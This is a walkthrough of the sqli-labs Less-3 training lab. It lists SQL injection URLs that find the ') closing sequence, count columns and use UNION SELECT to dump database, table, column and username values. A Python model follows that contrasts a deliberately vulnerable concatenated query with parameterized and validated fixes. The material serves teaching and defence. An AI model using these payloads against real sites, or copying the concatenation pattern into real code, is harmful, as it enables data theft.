Step 1. Enter an id; the page displays normally.
http://127.0.0.1/sqli-labs-master/Less-3/?id=1
Step 2. Determine whether the parameter is numeric or string-type. If both 1=1 and 1=2 display normally, the injection is string-type (the value is quoted, so the appended condition is never evaluated as SQL).
http://127.0.0.1/sqli-labs-master/Less-3/?id=1 and 1=1
http://127.0.0.1/sqli-labs-master/Less-3/?id=1 and 1=2
Step 3. Determine the closing sequence.
1. Try a single quote: the page errors.
http://127.0.0.1/sqli-labs-master/Less-3/?id=1'
2. Try adding a comment marker: the page still errors.
http://127.0.0.1/sqli-labs-master/Less-3/?id=1' --+
3. If it still errors after adding the comment marker, try adding a closing parenthesis. The page now displays normally, so the closing sequence is ')
http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+
Step 4. Determine the number of columns.
http://127.0.0.1/sqli-labs-master/Less-3/?id=1') order by 3 --+
Step 5. Determine which columns are displayed on the page.
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,2,3 --+
Step 6. Dump all database names.
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
Step 7. Dump all tables in the chosen database (security).
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
Step 8. Dump all columns in the chosen table (users).
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
Step 9. Dump all values of the chosen column (username).
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(username) from users),3 --+
Done~
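As an added illustration (not part of the original writeup and not sqli-labs' own PHP code), the following Python model shows why the walkthrough works and how the bug is fixed. It assumes the query shape that the ') closing sequence implies, WHERE id=('...'), builds the SQL by string concatenation the way the lab does, and then runs the same lookup with a bound parameter. The sample users table and the in-memory SQLite stand-in for the lab's MySQL "security" database are constructed for the demo; the lab itself runs on PHP/MySQL.

```python
import sqlite3

# Constructed sample data for the demo; not the lab's real users table.
SAMPLE_USERS = [
    (1, "alice", "pw-alice"),
    (2, "bob", "pw-bob"),
    (3, "carol", "pw-carol"),
]

# The writeup's payloads as the application receives them after URL decoding
# ("--+" in the URL arrives as "-- ", a comment marker followed by a space).
PAYLOAD_QUOTE = "1'"                                  # step 3.1: breaks the SQL
PAYLOAD_CLOSE = "1') -- "                             # step 3.3: page is normal
PAYLOAD_UNION = (                                     # step 9: leaks usernames
    "-1') union select 1,(select group_concat(username) from users),3 -- "
)


def make_db():
    """In-memory SQLite stand-in for the lab database (assumption, see lead-in)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """Assumed Less-3 query shape: the id is wrapped in ('...') and pasted
    straight into the SQL text. Returns the result rows, or None when the
    database rejects the statement (the lab prints that error on the page)."""
    sql = f"SELECT id, username, password FROM users WHERE id=('{user_id}') LIMIT 0,1"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def safe_lookup(conn, user_id):
    """Same query with a bound parameter: the driver hands the whole string
    to the engine as one value, so quotes, parentheses and comment markers are
    data, never syntax."""
    sql = "SELECT id, username, password FROM users WHERE id=(?) LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def safe_lookup_validated(conn, user_id):
    """Defence in depth: an id must be an integer, so reject anything else
    before it reaches the database at all. Returns None for rejected input."""
    try:
        numeric_id = int(user_id)
    except (TypeError, ValueError):
        return None
    return safe_lookup(conn, numeric_id)


if __name__ == "__main__":
    db = make_db()
    for label, payload in [("quote", PAYLOAD_QUOTE), ("close", PAYLOAD_CLOSE),
                           ("union", PAYLOAD_UNION)]:
        print(f"{label:>5} | concatenated: {vulnerable_lookup(db, payload)}")
        print(f"{label:>5} | parameterized: {safe_lookup(db, payload)}")
        print(f"{label:>5} | validated:     {safe_lookup_validated(db, payload)}")
```

Against the concatenated query the three payloads reproduce the walkthrough: the bare quote produces a SQL error, the ') -- payload restores a normal row, and the union payload returns a row whose second column is the comma-joined username list. The parameterized query returns no row for any of them, because the whole payload is compared with the integer id column as a single value, and the validated variant rejects them before a query is built. The numeric-versus-string test from step 2 is left out of this model deliberately: MySQL silently casts a string such as '1 and 1=1' to 1 in a numeric comparison, and SQLite does not, so that particular check does not transfer.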